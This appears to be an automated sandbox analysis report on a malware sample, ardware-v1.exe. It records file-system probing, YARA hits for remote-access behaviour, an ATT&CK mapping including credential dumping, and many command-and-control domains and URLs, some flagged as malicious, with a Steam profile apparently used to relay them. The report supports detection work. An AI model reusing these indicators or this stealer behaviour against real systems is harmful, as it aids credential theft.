                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\SFPUSAFIOL
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\EFOYFBOLXA
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\EOWRVPQCCS
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\EWZCVGNOWT
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\IPKGELNTQY
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\LSBIHQFDVT
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\NEBFQQYWPS
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\NWCXBPIUYI
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\QCFWYSKMHA
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: C:\Users\user\Documents\EEGWXUHVUG
                Source: C:\Users\user\Desktop\ardware-v1.exe  Directory queried: number of queries: 1001
                Source: Yara match; File source: 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2486324399.0000000001085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2521127608.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2422257557.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix, listed by tactic column (the numeric prefix before a technique is the count badge shown in the original matrix; techniques without a prefix carried no badge):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
                Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
                Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
                Defense Evasion: 11 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
                Discovery: 131 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Process Discovery; 2 File and Directory Discovery; 22 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
                Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging
                Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

                Source | Detection | Scanner | Label
                ardware-v1.exe | 21% | Virustotal |
                ardware-v1.exe | 24% | ReversingLabs |
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://lev-tolstoi.com/apiR8 | 0% | Avira URL Cloud | safe
                https://sordid-snaked.cyou/api7 | 100% | Avira URL Cloud | malware
                https://lev-tolstoi.com/e&quot | 0% | Avira URL Cloud | safe
                https://deafeninggeh.biz/apie | 100% | Avira URL Cloud | malware
                https://lev-tolstoi.com/apimSvx | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/api% | 0% | Avira URL Cloud | safe
                https://store.steampow | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/.$Hwl | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/avatar | 0% | Avira URL Cloud | safe
                https://deafeninggeh.biz/P: | 100% | Avira URL Cloud | malware
                https://lev-tolstoi.com/api | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com:443/apil | 0% | Avira URL Cloud | safe
                https://community.fastly.steamstatic. | 0% | Avira URL Cloud | safe
                http://ocsp.sectigo.com00 | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/pxT | 0% | Avira URL Cloud | safe
                https://awake-weaves.cyou/api8 | 100% | Avira URL Cloud | malware
                https://spend-shiny.cyou:443/api | 100% | Avira URL Cloud | malware
                https://lev-tolstoi.com/d | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/ | 0% | Avira URL Cloud | safe
                https://awake-weaves.cyou/apiL | 100% | Avira URL Cloud | malware
                https://lev-tolstoi.com/900 | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/er | 0% | Avira URL Cloud | safe
                https://lev-tolstoi.com/apim | 0% | Avira URL Cloud | safe
                https://deafeninggeh.biz:443/api1 | 100% | Avira URL Cloud | malware
                spend-shiny.cyou | 100% | Avira URL Cloud | malware
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                steamcommunity.com | 23.55.153.106 | true | false | | high
                lev-tolstoi.com | 104.21.66.86 | true | true | | unknown
                immureprech.biz | 178.62.201.34 | true | false | | high
                deafeninggeh.biz | 45.77.249.79 | true | false | | high
                sordid-snaked.cyou | unknown | unknown | false | | high
                diffuculttan.xyz | unknown | unknown | false | | high
                effecterectz.xyz | unknown | unknown | false | | high
                spend-shiny.cyou | unknown | unknown | true | | unknown
                awake-weaves.cyou | unknown | unknown | false | | high
                wrathful-jammy.cyou | unknown | unknown | false | | high
                debonairnukk.xyz | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                sordid-snaked.cyou | false | | high
                deafeninggeh.biz | false | | high
                effecterectz.xyz | false | | high
                wrathful-jammy.cyou | false | | high
                https://steamcommunity.com/profiles/76561199724331900 | false | | high
                awake-weaves.cyou | false | | high
                immureprech.biz | false | | high
                https://immureprech.biz/api | false | | high
                debonairnukk.xyz | false | | high
                https://lev-tolstoi.com/api | true | Avira URL Cloud: safe | unknown
                spend-shiny.cyou | true | Avira URL Cloud: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://player.vimeo.com | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | ardware-v1.exe | false | | high
                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://steamcommunity.com/?subsection=broadcasts | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://immureprech.biz/pi | ardware-v1.exe, 00000000.00000003.2331449931.0000000001021000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://deafeninggeh.biz/P: | ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | ardware-v1.exe | false | | high
                http://ocsps.ssl.com0? | ardware-v1.exe | false | | high
                http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | ardware-v1.exe | false | | high
                https://lev-tolstoi.com/avatar | ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://lev-tolstoi.com/e&quot | ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://store.steampowered.com/subscriber_agreement/ | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.gstatic.cn/recaptcha/ | ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://wrathful-jammy.cyou/api | ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.valvesoftware.com/legal.htm | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://lev-tolstoi.com/apiR8 | ardware-v1.exe, 00000000.00000003.2517557532.0000000001085000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://store.steampow | ardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.youtube.com | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.google.com | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://lev-tolstoi.com/.$Hwl | ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://lev-tolstoi.com/api% | ardware-v1.exe, 00000000.00000003.2422428346.0000000001049000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://sordid-snaked.cyou/api7 | ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://lev-tolstoi.com/apimSvx | ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://deafeninggeh.biz/apie | ardware-v1.exe, 00000000.00000003.2331449931.0000000001057000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://s.ytimg.com; | ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english& | ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://community.fastly.steamstatic.com/ | ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                                high
                                                                                                                https://lev-tolstoi.com/dardware-v1.exe, 00000000.00000003.2543085996.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561356645.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542350182.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2561005815.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543259774.00000000010D2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://steam.tv/ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://ocsp.sectigo.com00ardware-v1.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://wrathful-jammy.cyou/piardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lev-tolstoi.com/ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.0000000001054000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632953402.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632755180.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://wrathful-jammy.cyou/ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/points/shop/ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ardware-v1.exe, 00000000.00000003.2426252884.0000000003889000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426550854.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426325634.0000000003886000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://lev-tolstoi.com/pxTardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:ardware-v1.exe, 00000000.00000003.2484910898.00000000038A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.ardware-v1.exe, 00000000.00000003.2517406456.0000000003873000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2396924153.00000000010CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://sketchfab.comardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
